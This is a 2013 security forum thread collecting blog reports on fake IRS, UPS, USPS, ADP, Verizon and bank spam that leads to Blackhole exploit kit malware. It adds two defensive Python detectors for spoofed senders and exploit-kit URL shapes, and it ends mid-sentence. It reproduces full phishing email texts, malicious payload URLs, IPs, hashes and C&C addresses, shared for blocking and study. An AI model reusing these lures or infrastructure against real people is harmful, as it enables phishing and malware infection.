Fake 'TurboTax State Return Rejected' SPAM
- http://security.intuit.com/alert.php?a=72
2/14/13 - "People are receiving fake emails with the title 'TurboTax State Return Rejected'. Below is a copy of the email people are receiving. The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file.
> http://security.intuit.com/images/turbotaxstate.jpg
This is the end of the fake email..."
:mad::mad:
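A pattern that runs through the samples in this post and the ones before it: the display name or subject claims one brand (Intuit, NACHA, HP, UPS, the IRS) while the envelope sender is a completely unrelated domain (classmates.com, linkedin.com, xanga.com), and the "scan" or "secure message" arrives as an .htm or .zip attachment. The block below is an added example of mine, not from any of the blogs quoted here: it encodes those two observations as triage checks and runs them over messages constructed from the quoted headers, written the way a mail client would show them rather than defanged. The brand-to-domain map is an assumption made for the demo, not an authoritative list.

```python
"""
Two cheap triage checks for the spam shapes quoted in these posts:
 1. a brand named in the From display name or Subject whose sending domain
    is not one the brand actually uses;
 2. attachment types these campaigns rely on (.htm/.html scripts, .zip/.exe).
Added example. SAMPLES are constructed from the quoted headers; BRAND_DOMAINS
is an assumed map for illustration only.
"""
import re
from email.utils import parseaddr

BRAND_DOMAINS = {
    "intuit": {"intuit.com"}, "quickbooks": {"intuit.com"},
    "nacha": {"nacha.org"}, "irs": {"irs.gov"},
    "ups": {"ups.com"}, "usps": {"usps.com"},
    "linkedin": {"linkedin.com"}, "facebook": {"facebook.com", "facebookmail.com"},
    "hp": {"hp.com"},
}
RISKY_ATTACHMENTS = (".htm", ".html", ".exe", ".zip", ".scr", ".js")

SAMPLES = [
    {"From": '"Classmates . com" <classmatesemail@accounts.classmates.com>',
     "Subject": "Payroll Account Holded by Intuit", "Attachments": []},
    {"From": "Internal Revenue Service <zirconiumiag0@irs.gov>",
     "Subject": "Income Tax Refund NOT ACCEPTED", "Attachments": []},
    {"From": "Xanga <noreply@xanga.com>",
     "Subject": "Fwd: Scan from a HP ScanJet #72551", "Attachments": ["HP_Document.htm"]},
    {"From": "USPS client manager Michael Brewer <reports@usps.com>",
     "Subject": "USPS delivery failure report",
     "Attachments": ["USPS delivery failure report.zip"]},
]


def split_from(from_header: str):
    """Return (display name, sender domain) from a From: header value."""
    name, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
    return name, domain


def brands_mentioned(text: str) -> set:
    """Brand keywords appearing as whole words in the display name and subject."""
    return {b for b in BRAND_DOMAINS if re.search(rf"\b{re.escape(b)}\b", text, re.I)}


def domain_belongs_to(domain: str, brand: str) -> bool:
    return any(domain == d or domain.endswith("." + d) for d in BRAND_DOMAINS[brand])


def triage(msg: dict) -> list:
    """Findings for one message: brand/sender mismatches and risky attachment types."""
    name, domain = split_from(msg["From"])
    findings = []
    for brand in sorted(brands_mentioned(f"{name} {msg['Subject']}")):
        if not domain_belongs_to(domain, brand):
            findings.append(f"brand '{brand}' claimed but sender domain is {domain or '<none>'}")
    for att in msg.get("Attachments", []):
        if att.lower().endswith(RISKY_ATTACHMENTS):
            findings.append(f"risky attachment type: {att}")
    return findings


if __name__ == "__main__":
    for m in SAMPLES:
        print(m["Subject"], "->", triage(m) or ["no finding"])
```

Note what the second sample shows: a forged From that uses the brand's real domain (irs.gov) passes the brand check, because the check only compares strings. Header forgery of that kind is the job of SPF, DKIM and DMARC at the gateway; this heuristic catches the lazier variants, which is most of what is quoted in this thread.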
AplusWebMaster
2013-02-15, 13:36
FYI...
Fake IRS emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/15/spamvertised-irs-income-tax-refund-turned-down-themed-emails-lead-to-black-hole-exploit-kit/
Feb 15, 2013 - "It's tax season and cybercriminals are mass mailing tens of thousands of IRS (Internal Revenue Service) themed emails in an attempt to trick users into thinking that their income tax refund has been “turned down”. Once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/irs_income_tax_appeal_spam_email_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
micropowerboating .net – 175.121.229.209; 198.144.191.50 – Email: dooronemars @aol .com
Name Server: NS1.POOPHANAM .NET – 31.170.106.17
Name Server: NS2.POOPHANAM .NET – 65.135.199.21
The following malicious domains also respond to the same IPs (175.121.229.209; 198.144.191.50) and are part of the campaign’s infrastructure...
Although the initial client-side exploits serving domain used in the campaign (micropowerboating .net) was down when we attempted to reproduce its malicious payload, we managed to reproduce the malicious payload for a different domain parked at the same IP (175.121.229.209), namely, madcambodia .net.
Detection rate for the dropped malware:
madcambodia .net – 175.121.229.209 – MD5: * ... Trojan-Spy.Win32.Zbot.ivkf.
Once executed, the sample also phones back to the following C&C (command and control) servers: 94.68.61.135 :14511, 99.76.3.38 :11350
We also got another MD5 phoning back to the same IP..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/d83dad0125948b0c20016f98dae6248dd2d96d03be83b3bbcb0627715ea19a70/analysis/
File name: 2da28ae0df7a90ce89c7c43878927a9f
Detection ratio: 23/45
Analysis date: 2013-02-10 05
___
Malware sites to block 15/2/13
- http://blog.dynamoo.com/2013/02/malware-sites-to-block-15313.html
15 Feb 2013 - "A set of malware sites.. or I think two sets of malware sites that you might want to block. The .ru domains are connected with this botnet, a second set of sites seem to be something else malicious. Both groups of sites are connected by a server at 142.0.45.27 (Volumedrive, US**) which may be a C&C server. Interested parties might want to poke at the server a bit.. As a bonus, these are the IPs* that I can find connected with the .ru botnet that I have collected over the past few days. Some of them are dynamic, but it might be a starting point if anyone wants to poke at that botnet a bit more..."
* http://www.dynamoo.com/files/botnet-feb-13.txt
** https://www.google.com/safebrowsing/diagnostic?site=AS:46664
___
Fake IRS SPAM / azsocseclawyer .net
- http://blog.dynamoo.com/2013/02/cum-avenue-irs-spam-azsocseclawyernet.html
15 Feb 2013 - "This fake IRS spam (from an office on "Cum Avenue"!) actually leads to malware on azsocseclawyer .net:
Date: Fri, 15 Feb 2013 09:47:25 -0500
From: Internal Revenue Service [ahabfya196 @etax.irs .gov]
Subject: pecuniary penalty for delay of tax return filling
Herewith we are informing you that you are required to pay a surcharge for not filling the income tax return prior to January 31.
Please note that IRS Section 7117-F-8 specifies a money penalty of $2.000 for each Form 479 that is filled later than deadline for filling the income tax return or does not contain the exhaustive information described in 7117-F-8.
You will be released from the pecuniary penalty when the taxpayer shows that the failure to file was caused by substantial reason.
Please visit official website for more information
Internal Revenue Services United States, Department of Treasury
Ap #822-9450 Cum Avenue
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
The malicious payload is at [donotclick]azsocseclawyer .net/detects/necessary_documenting_broadcasts-sensitive.php (report here*) hosted on:
77.241.192.47 (VPSNET, Lithuania)
175.121.229.209 (Hanaro Telecom, Korea)..."
* http://urlquery.net/report.php?id=1009373
... BlackHole v2.0 exploit kit
___
Fake Wire transfer SPAM / 202.72.245.146
- http://blog.dynamoo.com/2013/02/wire-transfer-spam-20272245146.html
15 Feb 2013 - "This fake wire transfer spam leads to malware on 202.72.245.146:
Date: Fri, 15 Feb 2013 07:24:40 -0500
From: Tasha Rosenthal via LinkedIn [member @linkedin .com]
Subject: RE: Wire transfer cancelled
Good day,
Wire Transfer was canceled by the other bank.
Canceled transaction:
FED NR: 94813904RE5666838
Transfer Report: View
The Federal Reserve Wire Network
The malicious payload is on [donotclick]202.72.245.146 :8080/forum/links/public_version.php (Railcom, Mongolia) (report here) which is a well-known malicious IP that you should definitely block if you can.
Update: there is also a "Scan from a HP ScanJet #841548" spam for the same IP, sending victims to [donotclick]202.72.245.146 :8080/forum/links/column.php..."
:mad::fear::fear:
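Across these reports the landing URLs keep the same two shapes regardless of host: `:8080/forum/links/<name>.php` (often on a bare IP) and `/detects/<underscore_or-hyphen_words>.php`, with the payload request carrying query values made of short colon-separated groups. urlquery flags this as "Blackholev2 url structure" in the reports linked above. As an added example of mine (not urlquery's rule set or anything from dynamoo or Webroot), the block below scores proxy-log URLs against those shapes so a host can be flagged even when its domain is not yet on any block list. The squid-like log lines are constructed for the demo from URLs quoted in this thread plus two benign near-misses.

```python
"""
Score proxy-log URLs against the Blackhole v2 landing/payload URL shapes that
recur in these reports. Added example; SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed "timestamp client method url status" lines.
SAMPLE_LOG = """\
1361000001.123 10.0.0.12 GET http://emaianem.ru:8080/forum/links/column.php 200
1361000002.456 10.0.0.12 GET http://202.72.245.146:8080/forum/links/public_version.php?mmltejvt=1g:2v:33:2v:2w&pstvw=3d&xrej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&vczaspnq=1n:1d:1f:1d:1f:1d:1j:1k:1l 200
1361000003.789 10.0.0.15 GET http://micropowerboating.net/detects/pending_details.php 200
1361000004.012 10.0.0.15 GET http://azsocseclawyer.net/detects/necessary_documenting_broadcasts-sensitive.php 200
1361000005.345 10.0.0.20 GET http://www.example.com/forum/index.php?topic=12 200
1361000006.678 10.0.0.20 GET http://intranet.example.com/forum/links/faq.php 200
1361000007.901 10.0.0.21 GET http://cdn.example.net/js/app.js?v=1a:2b 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")
LANDING_PATH_RE = re.compile(r"^/forum/links/[a-z_]+\.php$")
DETECTS_PATH_RE = re.compile(r"^/detects/[a-z][a-z_-]*\.php$")
# Payload parameters: groups of one or two base-36 characters joined by colons.
ENCODED_VALUE_RE = re.compile(r"^[0-9a-z]{1,2}(?::[0-9a-z]{1,2}){3,}$")
IPV4_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def score_url(url: str):
    """Return (score, reasons); higher means closer to the kit's URL shape."""
    parts = urlsplit(url)
    score, reasons = 0, []
    if LANDING_PATH_RE.match(parts.path):
        score += 2
        reasons.append("landing path /forum/links/*.php")
        if parts.port == 8080:
            score += 1
            reasons.append("port 8080")
    if DETECTS_PATH_RE.match(parts.path):
        score += 3
        reasons.append("landing path /detects/*.php")
    encoded = [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
               if ENCODED_VALUE_RE.match(v)]
    if encoded:
        score += 2
        reasons.append("colon-encoded query values: " + ",".join(encoded))
    # A bare IP host only counts once something else already looks wrong.
    if score and IPV4_HOST_RE.match(parts.hostname or ""):
        score += 1
        reasons.append("bare IP host")
    return score, reasons


def scan_log(text: str, threshold: int = 3) -> list:
    """Parse log lines and return the requests scoring at or above threshold."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        score, reasons = score_url(m["url"])
        if score >= threshold:
            hits.append({"client": m["client"], "host": urlsplit(m["url"]).hostname,
                         "url": m["url"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["client"], h["host"], h["score"], "; ".join(h["reasons"]))
```

The threshold is set so that a `/forum/links/*.php` path alone (line 6, an ordinary forum on port 80) stays below it, while the same path on port 8080, a `/detects/*.php` path, or any colon-encoded payload query clears it. Tune the weights against your own proxy data before alerting on them.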
AplusWebMaster
2013-02-18, 14:06
FYI...
Facebook Wall posts malware propagations ...
- http://blog.webroot.com/2013/02/18/malware-propagates-through-localized-facebook-wall-posts/
Feb 18, 2013 - "We’ve recently intercepted a localized — to Bulgarian — malware campaign, that’s propagating through Facebook Wall posts. Basically, a malware-infected user would unknowingly post a link+enticing message, in this case “Check it out!“, on their friend’s Walls, in an attempt to abuse their trusted relationship and provoke them to click on the malicious link. Once users click on the link, they’re exposed to the malicious software...
Sample screenshot of the propagation in action:
> https://webrootblog.files.wordpress.com/2013/02/facebook_wall_spam_malware_links.png
Sample spamvertised URL appearing on Facebook users’ Walls:
hxxp ://0845 .com/fk7u
Sample redirection chain:
hxxp ://0845 .com/fk7u -> hxxp ://connectiveinnovations .com/mandolin.html?excavator=kmlumm -> hxxp ://91.218.38.245 /imagedl11.php
Sample detection rates for the malicious executables participating in the campaign:
hxxp ://91.218.38.245 /imagedl11.php – MD5: 1ad434025cd1fb681597db80447290e4 * ... Backdoor:Win32/Tofsee.F ...
Responding to this IP (91.218.38.245, AS197145 Infium Ltd.) are also... malicious/fraudulent domains...
More MD5s are known to have phoned back to 91.218.38.245:
MD5: 20057f1155515dd3a37afde0b459b2cf
MD5: 665419c0e458883122a790f260115ada
MD5: 1ea373c41eabd0ad3787039dd0927525
MD5: f3472ec713d3ab2e255091194e4dccaa
MD5: 4d54a2c022dad057f8e44701d52fec6b
MD5: 6807409c44a4a9c83ce67abc3d5fe982
As well as related MD5s phoning back to 185.4.227.76:
MD5: 6b1e671746373a5d95e55d17edec5623
MD5: 377c2e63ff3fd6f5fdd93ff27c8216fe
MD5: 2D4C5B95321C5A9051874CEE9C9E9CDC
MD5: 3f9df3fd39778b1a856dedebf8f39654
MD5: 82e2672c2ca1b3200d234c6c419fc83a
MD5: 796967255c8b99640d281e89e3ffe673
MD5: bc1883b07b47423bd30645e54db4775c
MD5: e6f081d2c5a3608fad9b2294f1cb6762
What’s special about the second C&C phone back IP (185.4.227.76) is that it was used in another Facebook themed malware campaign back in December, 2012, indicating that this cybercriminal/group of cybercriminals are actively impersonating Facebook Inc. for malicious and fraudulent purposes..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/ca53e5fb3ad6c53e7a2b7e0e711fde8c471a2296abe00cdb8db8e67e14075947/analysis/
File name: Dionis
Detection ratio: 31/45
Analysis date: 2013-02-15
AS197145 Infium
- https://www.google.com/safebrowsing/diagnostic?site=AS:197145
:mad::fear:
AplusWebMaster
2013-02-19, 13:43
FYI...
Fake Wire Transfer emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/19/malicious-re-your-wire-transfer-themed-emails-serve-client-side-exploits-and-malware/
Feb 19, 2013 - "... a persistent attempt to infect tens of thousands of users with malware through a systematic rotation of multiple social engineering themes... they all share the same malicious infrastructure. Let’s profile one of the most recently spamvertised campaigns, and expose the cybercriminals’ complete portfolio of malicious domains, their related name servers, dropped MD5 and its associated run time behavior...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_malware_exploits_wire_transfer_fake_black_hole_exploit_kit.png
Sample spamvertised compromised URLs:
hxxp://2555.ruksadindan .com/page-329.htm
hxxp://www.athenassoftware .com.br/page-329.htm
hxxp://www.sweetgarden .ca/page-329.htm
hxxp://lab.monohrom .uz/page-329.htm
hxxp://easy2winpoker .com/page-329.htm
hxxp://ideashtor .ru/page-329.htm
Sample client-side exploits serving URL:
hxxp:// 202.72.245.146 :8080/forum/links/public_version.php
... malicious domains also respond to the same IP (202.72.245.146) and are part of multiple campaigns spamvertised over the past couple of days...
(Long list available at the webroot URL above.)...
Sample malicious payload dropping URL:
hxxp:// 202.72.245.146 :8080/forum/links/public_version.php?mmltejvt=1g:2v:33:2v:2w&pstvw=3d&xrej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&vczaspnq=1n:1d:1f:1d:1f:1d:1j:1k:1l
Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 04e9d4167c9a1b82e622e04ad85f8e99 * ... Trojan.Win32.Yakes.cdxy.
Once executed, the sample creates... Registry Keys... And modifies them..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/
File name: contacts.exe
Detection ratio: 33/46
Analysis date: 2013-02-18
___
Something evil on 67.208.74.71
- http://blog.dynamoo.com/2013/02/something-evil-on-672087471.html
19 Feb 2013 - "67.208.74.71 (Inforelay, US) is a parking IP with several thousand IPs hosted on it. However, it also includes a large number of malicious sites using Dynamic DNS services. Some of these sites have recently moved from the server mentioned here*.
Probably most of the sites on this server are legitimate and blocking access to it might cause some problems. However, you can block most of these malicious domains by targeting the Dynamic DNS domain...
You can find a copy of the domains, IPs, WOT ratings and Google prognosis here** [csv].
These following domains are hosted on 67.208.74.71 and are listed as malicious by Google's Safe Browsing Diagnostics...
These domains are hosted on 67.208.74.71 and are not flagged by Google, but almost all have a poor WOT reputation and are very likely to be malicious...
These sites appear to have been hosted recently on 67.208.74.71 and are flagged as malware by Google, but are not resolving at present...
These domains appear to have been recently hosted on 67.208.74.71, are not flagged as malicious by Google but are nonetheless suspect..."
(More detail available at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/02/something-evil-on-926310523.html
** http://www.dynamoo.com/files/67-208-74-71.csv
- https://www.google.com/safebrowsing/diagnostic?site=AS:33597
___
Fake UPS SPAM / emmmhhh .ru
- http://blog.dynamoo.com/2013/02/ups-spam-emmmhhhru.html
19 Feb 2013 - "The spammers sending this stuff out always confuse UPS with USPS, this one is no exception although on balance it is more UPS than USPS.. anyway, it leads to malware on emmmhhh .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of Valda Gill via LinkedIn
Sent: 19 February 2013 10:00
Subject: United Postal Service Tracking Nr. H9878032462
You can use UPS .COM to:
Ship Online
Schedule a Pickup
Open a UPS .COM Account
Welcome to UPS Team
Hi, [redacted].
DEAR CUSTOMER , We were not able to delivery the post package
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With best regards , UPS Customer Services.
Copyright 2011 United Parcel Service of America, Inc. Your USPS ...us
There is an attachment UPS_ID5408466.htm which attempts to direct visitors to [donotclick]emmmhhh .ru:8080/forum/links/column.php hosted on:
50.31.1.104 (Steadfast Networks, US)
66.249.23.64 (Endurance International, US)
195.210.47.208 (PS Internet Company, Kazakhstan)
The following IPs and domains are all malicious and should be blocked:
50.31.1.104
66.249.23.64
195.210.47.208..."
___
Something evil on 74.208.148.35
- http://blog.dynamoo.com/2013/02/something-evil-on-7420814835.html
19 Feb 2013 - "Spotted by the good folks at GFI Labs here*, here** and here*** are several Canadian domains on the same server, 74.208.148.35 (1&1, US):
justcateringfoodservices .com
dontgetcaught .ca
blog.ritual .ca
lumberlandnorth .com
Obviously, there's some sort of server-level compromise here. Blocking access to 74.208.148.35 will give some protection against several very active malicious spam campaigns..."
* http://gfisoftware.tumblr.com/post/43492163416/adp-payroll-invoice-spam
** http://gfisoftware.tumblr.com/post/43411593074/dun-bradstreet-complaint-spam
*** http://gfisoftware.tumblr.com/post/43163682384/citibank-incoming-international-wire-transfer-spam
___
Fake pharma SPAM - Cyberbunker / 84.22.104.123
- http://blog.dynamoo.com/2013/02/cyberbunker-fake-pharma-spam-8422104123.html
19 Feb 2013 - "Crime-friendly host Cyberbunker strikes again, this time hosting more fake pharma sites on 84.22.104.123, being promoted through this suspicious looking spam:
Date: Tue, 19 Feb 2013 22:58:26 +0000 (GMT)
From: Apple [noreply @bellona.wg.saar .de]
To: [redacted]
Subject: Your Apple ID was used to sign in to FaceTime, iCloud, and iMessage on an iPhone 5
Dear Customer,
Your Apple ID ([redacted]) was used to sign in to FaceTime, iCloud, and iMessage on an iPhone 5.
If you have not recently set up an iPhone with your Apple ID, then you should change your Apple ID password. Learn More.
Privacy Policy
Copyright 2013 Apple Inc. 1 Infinite Loop, Cupertino CA 95014 - All Rights Reserved.
The spam has a link to an illegally hacked legitimate site that then bounces to drugstorepillstablets .ru hosted on 84.22.104.123 along with... spammy sites... Cyberbunker is nothing but bad news. Blocking 84.22.96.0/19 is an exceptionally good idea."
(More detail at the dynamoo URL above.)
* https://www.google.com/safebrowsing/diagnostic?site=AS:34109
:fear::mad:
AplusWebMaster
2013-02-20, 13:43
FYI...
Fake USPS SPAM / USPS delivery failure report.zip
- http://blog.dynamoo.com/2013/02/usps-spam-usps-delivery-failure.html
20 Feb 2013 - "This fake USPS spam contains malware in an attachment called USPS delivery failure report.zip.
Date: Wed, 20 Feb 2013 06:40:39 +0200 [02/19/13 23:40:39 EST]
From: USPS client manager Michael Brewer [reports @usps .com]
Subject: USPS delivery failure report
USPS notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: KnoxvilleFort
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: M1PZN6BI4F
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
The attachment is double-zipped, presumably to try to evade virus and content scanners. Opening it extracts another ZIP file called USPS report id 943577924988734.zip which contains another file called USPS report id 943577924988734.exe.
The VirusTotal detections for this are patchy and fairly generic*. Automated analysis tools are pretty inconclusive** when it comes to the payload, although if you are trying to clean it up then starting with HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched (which is set to "C:\Documents and Settings\All Users\svchost.exe") is probably a good start."
* https://www.virustotal.com/en/file/66eb0b099caf0cab296d7ad4cbe84e366c44cc465431a33963ac5b32d8e28682/analysis/1361351470/
File name: USPS report id 943577924988734.exe
Detection ratio: 27/46
Analysis date: 2013-02-20
** http://camas.comodo.com/cgi-bin/submit?file=66eb0b099caf0cab296d7ad4cbe84e366c44cc465431a33963ac5b32d8e28682
___
Something evil on 62.212.130.115
- http://blog.dynamoo.com/2013/02/something-evil-on-62212130115.html
20 Feb 2013 - "Something evil seems to be lurking on 62.212.130.115 (Xenosite, Netherlands) - a collection of sites connected with the Blackhole exploit kit, plus indications of evil subdomains of legitimate hacked sites. All-in-all, this IP is probably worth avoiding.
Firstly, there are the evil subdomains that have a format like 104648746540365e.familyholidayaccommodation .co.za - these are mostly hijacked .co.za and .cl domains. The following list contains the legitimate domains and IPs that appear to have been hijacked. Ones marked in red have been flagged as malicious by Google. Remember, these IPs are not evil, it is just the subdomains that are (on a different IP)...
The second bunch of domains appear to be connected with the Blackhole Exploit kit (according to this report*) and can be assumed to be malicious, and are hosted on 62.212.130.115...
The final group is where it gets messy. These are malicious subdomains that either are on (or have recently been on) 62.212.130.115. It looks like they are hardened against analysis, but they certainly shouldn't be here and can be assumed to be malicious too..."
(More detail at the dynamoo URL above.)
* http://pastebin.com/FNjkdB34
___
famagatra .ru injection attack in progress
- http://blog.dynamoo.com/2013/02/famagatraru-injection-attack-in-progress.html
20 Feb 2013 - "There seems to be an injection attack in progress, leading visitors to a hacked website to a malicious page on the server famagatra .ru.
The payload is at [donotclick]famagatra .ru:8080/forum/links/public_version.php?atd=1n:33:2v:1l:1h&qav=3j&yvxhqg=1j:33:32:1l:1g:1i:1o:1n:1o:1i&jehmppj=1n:1d:1f:1d:1f:1d:1j:1k:1l (report here*) which is basically a nasty dose of Blackhole.
84.23.66.74 (EUserv Internet, Germany)
195.210.47.208 (PS Internet Company, Kazakhstan)
210.71.250.131 (Chungwa Telecom, Taiwan)
The following domains and IPs are all part of the same evil circus:
84.23.66.74
195.210.47.208
210.71.250.131..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1050803
... Blackholev2 redirection successful
___
Fake Wire transfer SPAM / fulinaohps .ru
- http://blog.dynamoo.com/2013/02/wire-transfer-spam-fulinaohpsru.html
20 Feb 2013 - "This fake wire transfer spam leads to malware on fulinaohps .ru:
Date: Wed, 20 Feb 2013 04:28:14 +0600
From: accounting@[victimdomain]
Subject: Fwd: ACH and Wire transfers disabled.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
The malicious payload is at [donotclick]fulinaohps .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
84.23.66.74 (EUserv Internet, Germany)
195.210.47.208 (PS Internet Company, Kazakhstan)
210.71.250.131 (Chungwa Telecom, Taiwan)
These are the same IPs as used in this attack**, you should block them if you can."
* http://urlquery.net/report.php?id=1051770
... suspicious URL pattern... obfuscated URL
** http://blog.dynamoo.com/2013/02/famagatraru-injection-attack-in-progress.html
___
Fake SendSecure Support SPAM / secure_message... .zip
- http://blog.dynamoo.com/2013/02/sendsecure-support-spam.html
20 Feb 2013 - "This fake SendSecure Support / Bank of America spam comes with a malicious attachment called secure_message_02202013_01590106757637303.zip:
Date: Wed, 20 Feb 2013 11:23:43 -0400 [10:23:43 EST]
From: SendSecure Support [SendSecure.Support @bankofamerica .com]
Subject: You have received a secure message from Bank Of America
You have received a secure message.
Read your secure message by opening the attachment. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.
Help - https ://securemail.bankofamerica .com/websafe/help?topic=Envelope
The zip file secure_message_02202013_01590106757637303 .zip unzips into secure_message_02202013_01590106757637303 .exe with a VirusTotal detection**... According to ThreatExpert***, the malware installs a keylogger and also tries to phone home to:
blog.ritual .ca
dontgetcaught .ca
These sites are hosted on 74.208.148.35 which I posted about yesterday*. Blocking access to this IP might mitigate against this particular threat somewhat."
* http://blog.dynamoo.com/2013/02/something-evil-on-7420814835.html
** https://www.virustotal.com/en/file/3032621c36074eb28beb10730fdb2d2618fb4d59a7e6f3290b3d4ae0854afd7e/analysis/1361376818/
File name: secure_message_02202013_{DIGIT[17]}.exe
Detection ratio: 6/46
Analysis date: 2013-02-20
*** http://www.threatexpert.com/report.aspx?md5=d89e680d6e9fee363b27e6479a4dffd3
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Airline Ticket Credit Card Processing E-mail Messages - February 20, 2013
Fake CashPro Online Digital Certificate Notification E-mail Messages - February 20, 2013
Fake Tax Document Notification E-mail Messages - February 20, 2013
Fake Rejected Tax Form Notification E-mail Messages - February 20, 2013
Fake Bank Deposit Notification E-mail Messages - February 20, 2013
Fake Package Delivery Failure E-mail Messages - February 20, 2013
Fake Product Order E-mail Messages - February 20, 2013
(More info and links available at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-02-21, 16:45
FYI...
Fake ADP SPAM / faneroomk .ru
- http://blog.dynamoo.com/2013/02/adp-spam-faneroomkru.html
21 Feb 2013 - "This fake ADP spam tries (and fails) to lead to malware on faneroomk .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply@bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 20 February 2013 20:02
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 001737199
Thu, 21 Feb 2013 02:01:39 +0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following notes:
• Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
• Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 890911798
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is meant to be [donotclick]faneroomk .ru:8080/forum/links/column.php but right at the moment it is not resolving... The following IPs and domains are all related:
41.168.5.140
110.164.58.250
184.106.195.200
210.71.250.131
203.171.234.53 ..."
(More detail at the dynamoo URL above.)
___
Fake Verizon Wireless SPAM / participamoz .com
- http://blog.dynamoo.com/2013/02/verizon-wireless-spam-participamozcom.html
20 Feb 2013 - "This fake Verizon Wireless spam leads to malware on participamoz .com:
Date: Wed, 20 Feb 2013 23:24:49 +0400
From: "AccountNotify @verizonwireless .com" [cupcakenc0 @irs .gov]
Subject: Verizon wireless online bill.
Important account information from Verizon Wireless
Your current bill for your account ending in XXXX-XX001 is now available online in My Verizon
Total Balance Due: $48.15
Scheduled Automatic Payment Date: 02/25/2012
Mind that payments and/or adjustments made to your account after your bill was generated will be deducted from your automatic payment amount.
> Review and Pay Your Bill
Thank you for choosing Verizon Wireless.
My Verizon is also available 24/7 to assist you with:
Vrowsing your usage
Updating your plan
Adding Account Members
Paying your bill
Finding accessories for your devices
And much, much more...
2011 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 190WVB | Basking Ridge, NJ 07990
We respect your privacy. Please review our privacy policy for more information
If you are not the intended recipient and feel you have received this email in error; or if you would like to update your customer notification preferences, please click here.
The malicious payload is at [donotclick]participamoz .com/detects/holds_edge.php hosted on:
161.200.156.200 (Chulanet, Thailand)
173.251.62.46 (MSP Digital / Cablevision, US)
The following IPs and domains are connected and should be treated as malicious:
161.200.156.200
173.251.62.46
prosctermobile .com
aftandilosmacerati .com
pardontemabelos .com
participamoz .com ..."
___
Fake Verizon emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/21/fake-verizon-wireless-statement-themed-emails-lead-to-black-hole-exploit-kit/
Feb 21, 2013 - "On a periodic basis, cybercriminals are spamvertising malicious campaigns impersonating Verizon Wireless to tens of thousands of Verizon customers across the globe in an attempt to trick them into interacting with the fake emails... one of the most recently spamvertised campaigns impersonating Verizon Wireless. Not surprisingly, once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/verizon_wireless_statement_fake_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
participamoz .com – 173.251.62.46; 161.200.156.200 – Email: dort.dort @live .com
Name Server: NS1.THEREGISTARS .COM – 31.170.106.17 – Email: lockwr @rocketmail .com
Name Server: NS2.THEREGISTARS .COM – 67.15.223.219 – Email: lockwr @rocketmail .com
... Upon successful client-side exploitation, the campaign drops MD5: 4377dcc591f87cc24e75f8c69a2a7f8f * ... UDS:DangerousObject.Multi.Generic.
It then attempts to phone back to the following IPs:
